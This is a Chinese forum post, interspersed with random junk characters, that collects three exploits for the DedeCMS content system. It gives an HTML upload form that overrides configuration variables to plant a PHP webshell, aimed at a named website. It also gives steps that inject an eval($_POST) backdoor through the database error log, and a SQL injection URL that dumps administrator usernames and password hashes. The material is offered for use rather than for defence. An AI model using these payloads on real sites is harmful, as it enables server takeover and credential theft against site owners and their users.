+ a: f- _/ E9 `9 j* i$ N5 g0 c8 g3 K! T# t! m- G: T
, W( l6 I- Q0 ^# G8 c$ p5 W
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞- p2 F9 ]7 t9 w1 A$ j; v# b
<html>
+ f: ~: a# q- k% N' W6 S<head>4 l9 W9 g" w; X+ E" s: l! {+ c
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>9 N# i3 Q2 F  B  q. x: E  W2 G
</head>+ c" c1 w3 a/ }: u  h/ \3 ~
<body style="FONT-SIZE: 9pt">5 n$ H  E" i- N
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />. c- j1 w6 m. H/ N8 ]8 e
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
: z! k7 A4 L$ |<input type='hidden' name='activepath' value='/data/cache/' />
0 c, r( @. J# W5 w, u  ^<input type='hidden' name='cfg_basedir' value='../../' />
6 h) U# s  k/ H7 Q<input type='hidden' name='cfg_imgtype' value='php' />
5 q6 W; O) J$ Z; u. n  [<input type='hidden' name='cfg_not_allowall' value='txt' />  I7 U3 G: _4 X3 h  i' x
<input type='hidden' name='cfg_softtype' value='php' />" A# @3 ~  l" j6 Z3 l2 H/ `
<input type='hidden' name='cfg_mediatype' value='php' />
- n: D3 y% z' }  {<input type='hidden' name='f' value='form1.enclosure' />4 w1 g, {# |2 n& G' f
<input type='hidden' name='job' value='upload' />+ ~/ P- q3 _* ^6 L  c) T8 J
<input type='hidden' name='newname' value='fly.php' />! e: y9 j" U& {  @
Select U Shell <input type='file' name='uploadfile' size='25' />8 w8 V+ a0 W' j/ S8 H, l
<input type='submit' name='sb1' value='确定' />
% K0 G. W1 Z; @: s6 h& p</form>* F2 t$ n# L! {
<br />It's just a exp for the bug of Dedecms V55...<br />0 m9 U+ {# }9 Z) W0 x
Need register_globals = on...<br />4 p: N6 w) d. ^% G/ C
Fun the game,get a webshell at /data/cache/fly.php...<br />
' h. X# n1 ?. b' Z! O# l+ _8 R5 c3 m, S</body>6 R/ W9 m! \2 t- |% S
</html>  u& j1 b+ [, x1 W

$ f% c! @1 L, Y$ P5 v1 f! H/ }
$ @6 q1 ~+ l2 s0 j& f+ L& u+ O, U" F

# s( k% t) R1 k) ~8 U3 a# x# ^4 v, b1 K; r% i
. O" |, x* T  y: o6 a6 X1 a: ]) p

% E( o' _+ d# v9 d- h! V: o" T8 a5 Q1 T8 [
( ^2 y" {8 Y6 b& m! {- d  G3 ^
' R+ N6 h: B" H+ w: h& ~$ U$ x
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞6 Q) s1 t, q! V# Z1 B/ \
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。. ?: S& a( B7 k% {0 N! Q
1. 访问网址:: k) q% d- X* U, v7 u
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
% Q0 C2 `( x, L可看见错误信息
& _4 p7 E" p2 Z  [" o3 }
  ^0 Z7 j  k, \1 K7 W: J- B. b  U7 a2 `
2. 访问
http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。5 G; J! W4 c9 W
int(3) Error: Illegal double '1024e1024' value found during parsing
. x& d" E8 U9 U+ E. X2 u9 `( lError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
: y8 y& y4 A' _' X! P8 M3 x
' H/ n! ~( j$ v0 G# n7 |7 I2 m) z( d2 X- [; P  L
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
6 L1 f8 e0 c& c, p4 V9 K0 }7 a4 U1 ?+ E  r4 W# Y8 C3 O' m$ j

3 U! K/ X) p& z5 n$ Y2 K<form action=”
http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
# N- N$ u- B% T' L8 s' B/ ~( @5 d0 P+ K3 E' l5 Y; G6 V
. o8 P' H* N9 c0 O2 T+ `
按确定后的看到第2步骤的信息表示文件木马上传成功.
2 P, T9 n. L% H' z) r
  o5 _" n$ A$ ^2 Q$ g* d
6 A+ V: e  N5 V/ `" X8 e9 n0 y/ G" p- i' |- b! {" D; Y( Z9 _

" y0 s% @* V# N2 k( k, Z  m9 a% q' U% K% c9 P! i- S0 e! b

- V. L1 {+ G! M- K( @8 v+ _
; c4 h9 C; k1 s3 c% V( c- V( }* O8 C0 Y( d0 ^* k7 d
: g+ R9 s& ^0 X: _' |0 O! k
6 Z5 L# A9 G- f/ J; @* b. \/ n$ x
: X' N7 Q( A3 q* j$ b  G( a' H

; x3 J. w( b% p1 L7 B! {织梦(DedeCms)plus/infosearch.php 文件注入漏洞# r+ O! B, K+ l
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表